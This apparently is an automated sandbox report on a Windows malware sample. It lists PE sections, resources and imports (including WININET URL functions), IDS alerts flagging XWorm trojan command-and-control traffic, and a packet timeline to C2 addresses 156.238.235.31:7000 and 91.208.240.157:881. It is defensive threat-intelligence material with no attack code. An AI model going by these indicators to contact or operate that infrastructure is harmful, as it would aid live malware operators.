              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x175480x176004a4de4552a8a05cfea4c4ff1b4e9532eFalse0.5845901570855615data6.644459188479388IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x190000x50f00x5200a3a672f406e19ad8de1bbcfe8651a57dFalse0.3600895579268293data4.931568838551667IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x1f0000x37c40x1a0045f752e15a14fca1b3ff2706b42091afFalse0.3167067307692308data3.8749828218454043IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x230000x1c6ec0x1c800f7f67e74808bd8e37d727b9023fabdcbFalse0.2743540981359649data4.804387241910113IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x400000x1e2e0x2000fdaa21fac2a6fbee01e606c2b1b84ce7False0.4864501953125data4.81697133250145IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_ICON0x233a00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152ChineseChina0.2554878048780488
              RT_ICON0x23a080x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512ChineseChina0.3602150537634409
              RT_ICON0x23cf00x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288ChineseChina0.39344262295081966
              RT_ICON0x23ed80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128ChineseChina0.4358108108108108
              RT_ICON0x240000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsChineseChina0.4986673773987207
              RT_ICON0x24ea80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsChineseChina0.5888989169675091
              RT_ICON0x257500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsChineseChina0.548963133640553
              RT_ICON0x25e180x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsChineseChina0.40534682080924855
              RT_ICON0x263800x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584ChineseChina0.18236129184904767
              RT_ICON0x36ba80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896ChineseChina0.3425838450637695
              RT_ICON0x3add00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600ChineseChina0.3924273858921162
              RT_ICON0x3d3780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224ChineseChina0.49953095684803
              RT_ICON0x3e4200x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400ChineseChina0.580327868852459
              RT_ICON0x3eda80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088ChineseChina0.6906028368794326
              RT_GROUP_ICON0x3f2100xcadataChineseChina0.6089108910891089
              RT_VERSION0x3f2dc0x2a8dataChineseChina0.4602941176470588
              RT_MANIFEST0x3f5840x165ASCII text, with CRLF line terminatorsEnglishUnited States0.5434173669467787
              DLLImport
              KERNEL32.dllCloseHandle, ReadFile, VirtualAlloc, GetFileSize, CreateFileA, Sleep, GetTickCount64, VirtualFree, SetEndOfFile, CreateFileW, SetStdHandle, WriteConsoleW, LoadLibraryW, IsValidLocale, InterlockedIncrement, InterlockedDecrement, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, GetSystemTimeAsFileTime, GetLastError, HeapFree, RaiseException, RtlUnwind, GetCommandLineA, HeapSetInformation, GetStartupInfoW, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, HeapAlloc, IsProcessorFeaturePresent, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, SetLastError, GetCurrentThreadId, GetProcAddress, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, ExitProcess, WriteFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, GetLocaleInfoW, HeapReAlloc, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, GetProcessHeap
              WININET.dllInternetCloseHandle, InternetReadFile, InternetOpenUrlA, InternetOpenA
              Language of compilation systemCountry where language is spokenMap
              ChineseChina
              EnglishUnited States
              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              07/02/24-19:21:18.807141TCP2855924ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound497127000192.168.2.6156.238.235.31
              07/02/24-19:25:04.354852TCP2852870ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes700049712156.238.235.31192.168.2.6
              07/02/24-19:24:55.688649TCP2852874ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2700049712156.238.235.31192.168.2.6
              07/02/24-19:25:04.355848TCP2852923ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)497127000192.168.2.6156.238.235.31
              07/02/24-19:22:57.227073TCP2853193ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound497127000192.168.2.6156.238.235.31
              TimestampSource PortDest PortSource IPDest IP
              Jul 2, 2024 19:20:59.793061018 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:20:59.797980070 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:20:59.798129082 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:20:59.798795938 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:20:59.803639889 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.729688883 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.729723930 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.729801893 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.729819059 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.729837894 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:00.729842901 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.729861975 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.729866982 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:00.729912043 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:00.729965925 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.729984999 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.730004072 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.730010033 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:00.730031013 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.730053902 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:00.730087996 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:00.734653950 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.734708071 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.734714031 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:00.734754086 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:00.734855890 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.734899998 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:00.967556000 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.967585087 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.967617035 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.967633009 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.967653036 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.967673063 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.967725039 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:00.967787027 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:00.967966080 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.967993975 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.968014956 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.968015909 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:00.968033075 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.968051910 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.968051910 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:00.968075991 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.968087912 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:00.968130112 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:00.968914032 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.968943119 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.968962908 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.968965054 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:00.968981981 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.969001055 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.969007015 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:00.969018936 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.969038963 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:00.969068050 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:00.969857931 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.969877958 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.969907045 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.969911098 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:00.969924927 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.969939947 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:00.969944954 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.969960928 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:00.969984055 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:00.972584009 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.972652912 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:00.972652912 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:00.972698927 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.205224037 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.205317020 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.205384970 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.205401897 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.205419064 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.205455065 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.205461025 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.205511093 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.205519915 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.205560923 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.205576897 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.205606937 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.205619097 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.205648899 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.205657959 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.205687046 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.205704927 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.205704927 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.205724955 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.205725908 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.205749035 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.205775023 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.205816031 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.205833912 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.205859900 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.205866098 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.205887079 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.205914021 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.205945015 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.205964088 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.205982924 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.205998898 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.206001997 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.206047058 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.206067085 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.206083059 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.206084967 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.206118107 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.206136942 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.206600904 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.206631899 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.206650019 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.206653118 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.206674099 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.206700087 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.206814051 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.206866026 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.206866026 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.206886053 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.206906080 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:21:01.206909895 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.206929922 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:01.206954956 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:21:08.593209982 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:21:08.599009037 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:21:08.599119902 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:21:08.717434883 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:21:08.722500086 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:21:18.807141066 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:21:18.812153101 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:21:19.125055075 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:21:19.179717064 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:21:19.431471109 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:21:19.436207056 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:21:25.684818983 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:21:25.726649046 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:21:28.899960041 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:21:28.904870987 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:21:29.215818882 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:21:29.222966909 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:21:29.227804899 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:21:38.992804050 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:21:38.999598980 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:21:39.455928087 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:21:39.459136963 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:21:39.463927031 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:21:49.086750031 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:21:49.091617107 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:21:49.402178049 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:21:49.412224054 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:21:49.417469025 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:21:55.684200048 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:21:55.726634979 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:21:59.179985046 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:21:59.184711933 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:21:59.514632940 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:21:59.517605066 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:21:59.522593975 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:06.208916903 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:22:06.209029913 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:22:09.281100988 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:09.286555052 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:09.596302986 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:09.598550081 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:09.603451014 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:19.367544889 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:19.372447968 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:19.687508106 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:19.702212095 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:19.707083941 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:25.692378998 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:25.745198965 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:29.461374044 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:29.466212988 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:29.777153969 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:29.779062986 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:29.785511971 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:39.555286884 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:39.560198069 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:39.896349907 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:39.902084112 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:39.906950951 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:41.539473057 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:41.545684099 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:41.922030926 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:41.930083990 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:41.936285973 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:46.727310896 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:46.732182980 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:46.836477041 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:46.841376066 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:46.852045059 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:46.857091904 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:46.914798975 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:46.919634104 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:46.930160999 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:46.935436010 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:46.992749929 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:46.998213053 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:47.051199913 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:47.053266048 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:47.058137894 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:47.271914959 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:47.274363995 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:47.279108047 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:47.495666027 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:47.497394085 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:47.502252102 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:47.502311945 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:47.507010937 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:47.706434011 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:47.710346937 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:47.715691090 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:49.336594105 CEST49710881192.168.2.691.208.240.157
              Jul 2, 2024 19:22:49.341425896 CEST8814971091.208.240.157192.168.2.6
              Jul 2, 2024 19:22:51.023863077 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:51.029045105 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:51.340300083 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:51.342724085 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:51.347724915 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:55.672386885 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:55.726739883 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:57.164684057 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:57.169503927 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:57.227072954 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:57.231888056 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:57.496575117 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:57.498212099 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:57.503401995 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:57.700462103 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:22:57.702790976 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:22:57.707792997 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:07.321041107 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:07.326109886 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:07.644391060 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:07.665540934 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:07.670366049 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:17.414582014 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:17.868839979 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:18.085601091 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:18.085621119 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:18.400425911 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:18.408128977 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:18.412947893 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:20.789710999 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:20.794683933 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:21.105202913 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:21.107351065 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:21.112395048 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:22.867976904 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:22.872796059 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:23.023977995 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:23.028872967 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:23.117738962 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:23.123203039 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:23.183339119 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:23.186151981 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:23.192059040 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:23.402365923 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:23.404529095 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:23.409699917 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:23.759919882 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:23.770540953 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:23.775561094 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:25.684478045 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:25.870811939 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:26.076395988 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:26.076492071 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:26.305237055 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:26.310267925 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:26.621445894 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:26.626133919 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:26.630927086 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:36.399049044 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:36.403913021 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:36.713705063 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:36.715754986 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:36.721172094 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:36.883605003 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:36.888422012 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:37.258467913 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:37.263339996 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:37.299423933 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:37.301352024 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:37.349909067 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:37.573506117 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:37.575319052 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:37.580142021 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:47.352184057 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:47.358241081 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:47.667578936 CEST700049712156.238.235.31192.168.2.6
